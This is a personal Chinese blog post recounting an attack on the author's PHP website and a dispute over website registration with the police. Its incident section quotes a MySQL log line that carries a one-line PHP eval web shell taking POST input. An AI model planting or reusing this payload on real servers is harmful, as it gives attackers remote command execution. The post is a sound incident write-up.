一些计算机零碎知识随写（25年1月）-1

我原以为世界上有技术的那批人不会那么闲，我错了，被脚本真实了。

今天正隔着画画呢，手机突然弹出几条安全告警通知。

急忙打开服务器，发现问题不简单，直接关服务器重装系统.....

首先，不要认为小网站，没什么人看就不做防护

互联网不缺乏脚本小子和没啥事喜欢攻击的黑客（在这个时代也不是没有可能是恶意的流窜ai），不要向我一样，认为这个网站没什么人看，什么保护也不加，等到被爆破了才急忙修改，要是生产环境被这么搞一下那就很坏了。（各种意义上的）

因为我是php写的网站，php的漏洞很多是历史遗留问题了，没有很好的代码规范的话那很容易被入侵。

就比如我没有加入文件验证之类的（我当时的想法：不会有人这么闲吧）。

我的思考

php这个语言漏洞太多，对于我来说要么以后补课网络安全php这方面的课程，要么趁早换一门语言。

那名坏笔到底在我服务器干了什么呢？

事情已经发生了，气急败坏不如冷静分析。

首先是恶意上传一个php文件，然后查询了我所有的数据库文件

具体的代码如下

C:\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
		   60 Query	select'<?php eval($_POST[admin]);?>'
		   60 Quit

那很坏了

eval 函数在这种情况下如果被成功执行，明显是具有恶意企图的，可能会导致服务器被攻击者远程控制、执行任意命令等安全风险。

第二个是一个木马病毒

太坏了

根据计算机病毒百科来看这玩意是近几年的开发的病毒。

可能会修改系统的关键文件，造成系统崩溃或无法正常启动。

它可以监控用户的计算机操作，并窃取敏感信息，如银行账户密码、个人隐私等。

所以说病毒什么乱七八糟并不是少了，而是坏笔们不直接打普通电脑了。

最终它干了什么

看样子是想把我服务器当作代理（？不确定。从它后面安装的内网穿透工具和代理工具来看是这样的。

然后正上厕所呢，公安给我打电话来了。

公安备案失败

之前icp备案根据腾讯云的提示操作起来没有过于麻烦，就是写写表（个人是这样，企业的话多一些步骤。）

然后icp过完审核居然还要公安部审核，就不能一起审核吗，真是徒增开发者的麻烦呢。

个人的网站icp备案和公安的表几乎没有什么差别，所以真的很难理解呢！

然后就打电话告诉我说不受理，去自己的户籍地办理去（icp是常驻地）

emm...???

感叹一些地方上的办事效率差，效率低了。

所以你以为我要告诉你个人开发者地址填写的时候要写户籍地icp写常驻地吗？

不啊我的朋友，个人博客要就不申请域名要不就一步到位买国外的好啦！就不用这么多麻烦的手续啦！